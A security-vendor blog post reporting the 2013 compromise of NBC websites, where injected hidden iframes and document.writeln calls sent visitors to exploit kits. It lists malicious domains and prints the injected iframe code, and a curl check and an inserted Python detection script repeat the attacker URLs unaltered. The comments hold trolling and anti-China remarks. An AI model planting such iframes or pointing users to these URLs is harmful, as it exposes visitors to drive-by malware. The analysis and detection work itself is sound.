Sucuri Blog
NBC Website HACKED – Be Careful Surfing

February 21, 2013Tony Perez


Breaking: the NBC site is currently compromised and blacklisted by Google. Anyone who visits the site (including any sub page) will have malicious iframes loaded, as well as being redirected to exploit kits (Redkit):

*Update: Not only NBC.com, but many other NBC sites, including Late Night with Jimmy Fallon, Jay Leno's Garage and others.

[Screenshot, 2013-02-21 11:15 AM]

If you visit it from Chrome or Firefox, you get the following warning:

[Screenshot of the browser warning, 2013-02-21 11:18 AM]

It seems that the payload is conditional, so a different iframe domain is loaded each time (cycling out various domains). Some of the malicious domains we identified include:

hxxp://walterjeffers.com/
hxxp://nikweinstein.com/
hxxp://umaiskhan.com/
hxxp://wordpresspluginsstudio.com/ctuk.html

All their pages had this iframe injected:

<iframe src="httx://nikweinstein.com/cl/google.php" width=1 height=1..

And this is what got added to their JavaScript files:

document.writeln (" <iframe src="httx://walterjeffers.com/ctuk.html" width=1&nbsp..

Note that these domains keep changing, which tells us that something on the server is generating the payload. This isn't an uncommon practice, and it also tells us that the script is likely still on the box. The fact that it's impacting other sites tells us that the compromise might extend beyond the web application and onto the server. If those other sites are stored on separate boxes then we're looking at a much bigger network compromise, but that is speculative at the moment.

Our research team is analyzing the case (and the malware) and we will post more updates soon. What we can tell you is that you should not visit NBC's site right now. More details on the scan results here: http://sitecheck.sucuri.net/.

The folks at hitmanpro.blog are confirming that it is a drive-by-download attack, specifically using the Citadel Trojan, used for banking fraud and cyber-espionage. As for the attack vector leading to the compromise, that's always a challenge to speculate on.

It also appears that the compromise extends to other properties; we just found out that Late Night with Jimmy Fallon is also compromised:

[Screenshot, 2013-02-21 11:48 AM]

****Update: 13:42 PST | 02/21/2013*****

We did come across this great post by Dancho Danchev in which he explains things in more detail. It looks like this is (or was) a complex attack cycling out drive-by-downloads and malicious redirects. He adds the following domains to the growing list of those being cycled for the iframes:

hxxp://priceworldpublishing.com/aynk.html
hxxp://toplineops.com/mtnk.html
hxxp://moi-npovye-sploett.com/qqqq/1.php
hxxp://www.jaylenosgarage.com/trucks/PHP/google.php

He expands things with a list of domains being used for redirection:

hxxp://gonullersultani.net/znzd.htm
hxxp://erabisnis.net/znzd.htm
hxxp://electricianfortwayne.info/62.html
hxxp://moi-npovye-sploett.com/cGeQc0wz1KPI/larktion.php

He goes on to explain the payload being dropped, including its hash. He breaks down its phone-home mechanisms and begins to correlate this attack with others to find some association. Based on his analysis he ties these attackers to the same group responsible for the Facebook and Verizon spear phishing attempts a few days ago. He goes on to provide a lot more data.

Some are attributing the payload itself to the RedKit Exploit Kit, but that is still unconfirmed.

While some folks are reporting it was only infected for 15 minutes, we're not too sure about that: as of right now, emulating a number of user agents and crawling various links, we are still able to get it to render:

[Screenshot, 2013-02-21 1:54 PM]

****Update: 20:33 PST | 02/21/2013*****

So it's been many hours since the compromise was first identified and we're still seeing the infection on the NBC website: the same infection that has been discussed all day, but now only on a few pages. To make sure that our scanner is not broken, I have started testing manually via the terminal to verify that it is in fact still infected. I am jumping between various honeypots and checking like this:

# curl -sD - http://www.nbc.com/community/video/season-4-premiere-jim-rash/n31580/ | grep "<iframe"
		_iframeCode = '<iframe id="nbc-video-widget" width="'+_width+'" height="'+_height+'" src="'+playerPath+'?vid=n31580" frameborder="0"></iframe>';
	 var nbcAd728x90='<iframe id="ad728x90" name="ad728x90" src="about:blank" width=728 height=90 noresize scrolling=no hspace=0 vspace=0 frameborder=0 marginheight=0 marginwidth=0></iframe>';
<iframe src="http://nikweinstein.com/cl/google.php" width=1 height=1 frameborder="0"></iframe>

This tells me a couple of things.

First, it's either caught up in some kind of CDN cache or it's conditional. I am not able to replicate it on every box; it seems that as I jump around it comes and goes, but SiteCheck continues to catch it. I am starting to think that it's caught up in cache, though, which is still exceptionally dangerous for visitors.
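The curl | grep check above leaves the operator to eyeball which of the three iframes is the injected one, and to compare results across honeypots by hand. The following script is an added example (not Sucuri's SiteCheck code and not from the original post) that automates both halves of that triage: it flags iframes that are tiny (width or height of 1 or 0) and point off-site, distinguishing them from NBC's own player and ad frames; it applies the same check to document.writeln(...) calls of the kind found in the injected JavaScript files; and, given page bodies fetched from several vantage points or user agents, it reports whether the injection is served intermittently, which is the "conditional or cached" picture described above. Fetching is left to the curl loop on the page; all input below is constructed, modelled on the snippets shown in the post.

```python
import re
from urllib.parse import urlparse

# Matches one <iframe ...> opening tag and captures its attribute text.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name="value", name='value' or name=value (unquoted, as in width=1 height=1).
ATTR_RE = re.compile(r"""([a-zA-Z_:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
# document.write(...) / document.writeln(...) as used by the injected JS.
WRITE_RE = re.compile(r"document\.write(?:ln)?\s*\(", re.IGNORECASE)

# Constructed sample: the three <iframe> lines the curl | grep check returned.
# The first two are NBC's own player/ad frames; the third is the injected 1x1 frame.
INJECTED_LINE = '<iframe src="http://nikweinstein.com/cl/google.php" width=1 height=1 frameborder="0"></iframe>\n'
SAMPLE_HTML = (
    "<html><body><script>\n"
    "_iframeCode = '<iframe id=\"nbc-video-widget\" width=\"'+_width+'\" height=\"'+_height+'\""
    " src=\"'+playerPath+'?vid=n31580\" frameborder=\"0\"></iframe>';\n"
    "var nbcAd728x90='<iframe id=\"ad728x90\" name=\"ad728x90\" src=\"about:blank\" width=728"
    " height=90 frameborder=0 marginheight=0 marginwidth=0></iframe>';\n"
    "</script>\n" + INJECTED_LINE + "</body></html>\n"
)
CLEAN_HTML = SAMPLE_HTML.replace(INJECTED_LINE, "")
# Constructed sample modelled on the document.writeln injection in the JS files.
SAMPLE_JS = (
    "function init(){ return 1; }\n"
    "document.writeln ('<iframe src=\"http://walterjeffers.com/ctuk.html\" width=1 height=1 frameborder=0></iframe>');\n"
)


def parse_attrs(attr_text):
    """Turn the attribute text of a tag into a {name: value} dict."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        value = next(v for v in m.groups()[1:] if v is not None)
        attrs[m.group(1).lower()] = value
    return attrs


def _is_tiny(value):
    """width/height of 1 or 0 is the classic hidden-iframe footprint."""
    try:
        return int(value.strip().rstrip("px")) <= 1
    except ValueError:
        return False  # e.g. NBC's JS-templated width="'+_width+'"


def find_hidden_iframes(content, site_host):
    """Return the src of every iframe that is tiny and points to another host."""
    hits = []
    for m in IFRAME_RE.finditer(content):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""
        if not host or host == site_host or host.endswith("." + site_host):
            continue  # relative, about:blank or same-site: the player and ad frames
        if _is_tiny(attrs.get("width", "")) or _is_tiny(attrs.get("height", "")):
            hits.append(src)
    return hits


def find_writeln_iframes(js, site_host):
    """Apply the same check to the string written by document.write/writeln calls."""
    hits = []
    for m in WRITE_RE.finditer(js):
        end = js.find(");", m.end())
        segment = js[m.end(): end if end != -1 else len(js)]
        hits.extend(find_hidden_iframes(segment, site_host))
    return hits


def serving_pattern(observations, site_host):
    """observations: (label, body) pairs fetched from different boxes or user agents.
    A mix of infected and clean answers means the payload is conditional or cached."""
    infected = {label for label, body in observations if find_hidden_iframes(body, site_host)}
    return {
        "infected": sorted(infected),
        "clean": sorted(label for label, _ in observations if label not in infected),
        "intermittent": 0 < len(infected) < len(observations),
    }


# Constructed observations standing in for the honeypot-by-honeypot curl runs.
OBSERVATIONS = [
    ("honeypot-a/curl", SAMPLE_HTML),
    ("honeypot-b/firefox-ua", CLEAN_HTML),
    ("honeypot-c/chrome-ua", SAMPLE_HTML),
]

if __name__ == "__main__":
    print("html:", find_hidden_iframes(SAMPLE_HTML, "nbc.com"))
    print("js:", find_writeln_iframes(SAMPLE_JS, "nbc.com"))
    print("pattern:", serving_pattern(OBSERVATIONS, "nbc.com"))
```

The size test deliberately tolerates both quoted and unquoted attribute values because the injected tag used width=1 height=1 while NBC's own markup quotes its values; matching on the src host rather than on a domain list is what keeps the check useful while the attackers cycle domains.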

What are others seeing?


Unfortunately more and more large and small organizations are getting hit every day with similar compromises. If you find yourself on the sad end of this stick let us know at info@sucuri.net.


Categories: Security Education, Website Malware Infections. Tags: Hacked Websites, Website Blacklist.

About Tony Perez

Tony is the Head of Security Products at GoDaddy and Sucuri Co-Founder. His passion lies in educating and bringing awareness about online threats to business owners. His passions revolve around understanding the psychology of bad actors, the impacts and havoc hacks have on website owners, and thinking through the evolution of attacks. You can find his personal thoughts on security at perezbox.com and you can follow him on Twitter at @perezbox.

Comments

  1. Guest

    February 21, 2013

    “Note that these domains are changing, so it is likely that the attackers still have access there.”

    hahahaha….NO. These random domains being returned is automated. How are you even an infosec blogger? Who let you on a computer?

    • yo dawg

      February 21, 2013

      ok genius, explain how they’re updating the iframe url with generated urls?

    • Guest

      February 21, 2013

      Hi Guest

      Thanks for all the great insight. The statement is valid. As to yours however:

      “These random domains being returned is automated”

      If you look at the site or any of the discussion on the topic you see that it is not being returned via an API, which would then support your statement, it’s being generated on the server itself. If that is the case, then there is likely a script doing the generation. As it’s still being generated it’s safe to assume that there is some script on the server doing the generation. It’s not coming from the iframe itself, something is causing it. But maybe I missed the research that shows document.write also does self generation… let me know if I did..

      That in turn leads you to believe that if a script is still on the box creating the generation, regardless of it being removed, it is feasible that it also contains the backdoor to gain access or that another backdoor also exists giving them access. But the sheer fact that it's still generating, does that not constitute access?

      But you’re right, what do I know. Would love to see your post or documentation that better explains the regeneration.

      Thanks

      Tony

      • Gabe

        February 21, 2013

        And that, folks, is how you reply to a troll.

        • Nathan Vaughn

          February 22, 2013

          Wrong. The only correct response is none. You starve a troll. Duh.

  2. Michael Whitehurst

    February 21, 2013

    ERMAGERD CHINA

  3. Chilly8

    February 22, 2013

    It might be an error on the part of Google or Yahoo. Yahoo's site was saying, for some time, that the website for my online radio station had malware in it, when it did not, so take these warnings with a grain of salt.

  4. disqus_8sRkD8r4cq

    March 11, 2013

    http://www.videogameoracle.blogspot.com

  5. China Hate the World!

    March 12, 2013

    Down with china!
